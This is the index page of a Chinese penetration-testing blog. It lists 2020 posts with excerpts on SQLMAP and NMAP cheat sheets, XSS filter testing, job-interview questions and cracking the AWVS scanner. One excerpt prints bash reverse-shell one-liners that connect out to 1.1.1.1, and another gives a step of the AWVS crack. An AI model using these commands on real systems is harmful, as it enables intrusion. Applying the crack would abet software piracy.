Yangsir34 - 博客园

公告

2020年5月8日

摘要：工具链接请见文末，本站所提供工具仅供技术学习交流、请勿用于非法行为、否则后果自负。文件上传至kali，增加权限如下： awvs账户信息设置如下：修改破解文件：root@yangsir:~/awvs_linux_13# cp wvsc /home/acunetix/.acunetix/v_2002 阅读全文

posted @ 2020-05-08 10:57 Yangsir34 阅读(501) 评论(0) 推荐(0)

2020年5月6日

SQLMAP使用大全

摘要：详细脑图，包含日常各种所需。阅读全文

posted @ 2020-05-06 22:52 Yangsir34 阅读(183) 评论(0) 推荐(0)

一批代码审计资料分享

摘要：预览：链接： https://yang34.lanzous.com/icc1xeh 阅读全文

posted @ 2020-05-06 22:44 Yangsir34 阅读(230) 评论(0) 推荐(0)

2020年5月3日

业务逻辑漏洞常规漏洞集合

摘要：文末有网盘链接！互联网行业： P2P金融行业：电商行业：政务行业：常规漏洞： EXCEL网盘链接：https://ww.lanzous.com/ic8ddvc 更多分享：https://www.cnblogs.com/Yang34/p/12375242.html 阅读全文

posted @ 2020-05-03 23:57 Yangsir34 阅读(349) 评论(0) 推荐(0)

2020年4月30日

渗透测试方向面试分享(三)

摘要： * [HR面](#hr面) * [问题](#问题) * [对我们公司有什么了解，为什么选择本公司](#对我们公司有什么了解为什么选择本公司) * [为什么想要应聘这个职位](#为什么想要应聘这个职位) * [对安全服务是怎么理解的](#对安全服务是怎么理解的) * [如果我不知道渗透测试，两分钟说一阅读全文

posted @ 2020-04-30 10:27 Yangsir34 阅读(609) 评论(0) 推荐(0)

反弹shell姿势汇总

摘要： Bash TCP: Victim:bash -i >& /dev/tcp/1.1.1.1/6666 0>&1 /bin/bash -i > /dev/tcp/1.1.1.1/6666 0<& 2>&1 exec 5<>/dev/tcp/1.1.1.1/6666;cat <&5 | while rea 阅读全文

posted @ 2020-04-30 09:43 Yangsir34 阅读(436) 评论(0) 推荐(0)

2020年4月22日

NMAP使用大全

摘要：详细脑图，包含日常各种所需。阅读全文

posted @ 2020-04-22 21:54 Yangsir34 阅读(225) 评论(0) 推荐(0)

XSS过滤的测试方法

摘要： 1)尝试插入比较正常的HTML标签，例如：<b>，<i>，<u>来看一下返回页面的情况是怎样的，是否被HTML编码了，或者标签被过滤了。 2)尝试插入不闭合的标签，例如：<b，<i，<u，<marquee然后看一下返回响应，是否对开放的标签也有过滤。 3)然后测试几个XSS的payload，基本所有阅读全文

posted @ 2020-04-22 21:25 Yangsir34 阅读(1618) 评论(0) 推荐(0)

渗透测试方向面试分享(二)

摘要： * [面试问题记录](#面试问题记录) * [360](#360) * [SQL的存储引擎](#sql的存储引擎) * [SQL注入写shell的条件，用法](#sql注入写shell的条件用法) * [GPC是什么？开启了怎么绕过](#gpc是什么开启了怎么绕过) * [Mysql一个@和两个@什阅读全文

posted @ 2020-04-22 15:02 Yangsir34 阅读(851) 评论(0) 推荐(0)

渗透测试方向面试分享(一)

摘要： * [技术面试问题](#技术面试问题) * [CTF](#ctf) * [说一个印象深刻的CTF的题目](#说一个印象深刻的ctf的题目) * [sql二次注入](#sql二次注入) * [Python](#python) * [爬虫模块、框架、反爬虫机制（IP->代理池、验证码破解、UA）] 阅读全文

posted @ 2020-04-22 14:15 Yangsir34 阅读(1127) 评论(0) 推荐(0)

论安全萌新的自我修养

公告